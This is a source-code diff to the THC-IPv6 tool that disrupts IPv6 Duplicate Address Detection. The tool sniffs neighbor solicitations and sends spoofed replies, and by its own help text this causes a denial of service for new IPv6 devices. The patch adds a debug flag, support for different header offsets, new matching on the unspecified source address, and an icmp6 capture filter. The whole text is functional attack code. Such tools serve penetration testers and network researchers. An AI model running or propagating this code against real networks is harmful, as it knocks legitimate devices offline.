@@ -10,9 +10,7 @@
 #include <pcap.h>
 #include "thc-ipv6.h"
 
-extern int debug;
-
-unsigned char *pkt = NULL, *dstmac, *dst;
+unsigned char *pkt = NULL, *dstmac, *dst, matchfoo[16];
 int pkt_len = 0;
 thc_ipv6_hdr *ipv6;
 int mychecksum;
@@ -21,15 +19,23 @@ char *ptr3, *ptr4;
 int i;
 
 void help(char *prg) {
-  printf("%s %s (c) 2011 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
+  printf("%s %s (c) 2012 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
   printf("Syntax: %s interface\n\n", prg);
   printf("This tools prevents new ipv6 interfaces to come up, by sending answers to\n");
   printf("duplicate ip6 checks (DAD). This results in a DOS for new ipv6 devices.\n\n");
   exit(-1);
 }
 
-void intercept(u_char * foo, const struct pcap_pkthdr *header, const unsigned char *data) {
+void intercept(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) {
   unsigned char *ipv6hdr = (unsigned char *) (data + 14);
+  int len = header->caplen - 14;
+  
+  if (do_hdr_size) {
+    ipv6hdr = (unsigned char *) (data + do_hdr_size);
+    len = header->caplen - do_hdr_size;
+    if ((ipv6hdr[0] & 240) != 0x60)
+      return;
+  }
 
   if (debug) {
     printf("DEBUG: packet received\n");
@@ -37,13 +43,13 @@ void intercept(u_char * foo, const struct pcap_pkthdr *header, const unsigned ch
   }
   if (ipv6hdr[6] != NXT_ICMP6 || ipv6hdr[40] != ICMP6_NEIGHBORSOL || header->caplen < 78)
     return;
-  if (*(data + 22) + *(data + 23) + *(data + 24) + *(data + 25) + *(data + 34) + *(data + 35) + *(data + 36) + *(data + 37) != 0)
+  if (memcmp(matchfoo, ipv6hdr + 8, 16) != 0 && !(ipv6hdr[8] == 0xfe && ipv6hdr[48] != 0xfe))
     return;
   if (debug)
     printf("DEBUG: packet is a valid duplicate ip6 check via icmp6 neighbor solitication\n");
 
-  memcpy(ipv6->pkt + 22, data + 62, 16);        // copy target to srcip6
-  memcpy(ipv6->pkt + 62, data + 62, 16);        // copy target to target
+  memcpy(ipv6->pkt + 22, ipv6hdr + 48, 16);        // copy target to srcip6
+  memcpy(ipv6->pkt + 62, ipv6hdr + 48, 16);        // copy target to target
   mychecksum = checksum_pseudo_header(ipv6->pkt + 22, ipv6->pkt + 38, NXT_ICMP6, ipv6->pkt + 54, 32);
   ipv6->pkt[56] = mychecksum / 256;
   ipv6->pkt[57] = mychecksum % 256;
@@ -76,6 +82,12 @@ int main(int argc, char *argv[]) {
   char dummy[24];
   unsigned char *ownmac;
 
+  if (argc == 3 && strncmp(argv[1], "-d", 2) == 0) {
+    argv++;
+    argc--;
+    debug = 1;
+  }
+
   if (argc != 2 || strncmp(argv[1], "-h", 2) == 0)
     help(argv[0]);
 
@@ -105,7 +117,8 @@ int main(int argc, char *argv[]) {
     thc_dump_data(ipv6->pkt, ipv6->pkt_len, "Prepared spoofing packet");
     printf("\n");
   }
+  memset(matchfoo, 0, sizeof(matchfoo));
 
   printf("Started ICMP6 DAD Denial-of-Service (Press Control-C to end) ...\n");
-  return thc_pcap_function(interface, "ip6", (char *) intercept, NULL);
+  return thc_pcap_function(interface, "icmp6", (char *) intercept, 1, NULL);
 }
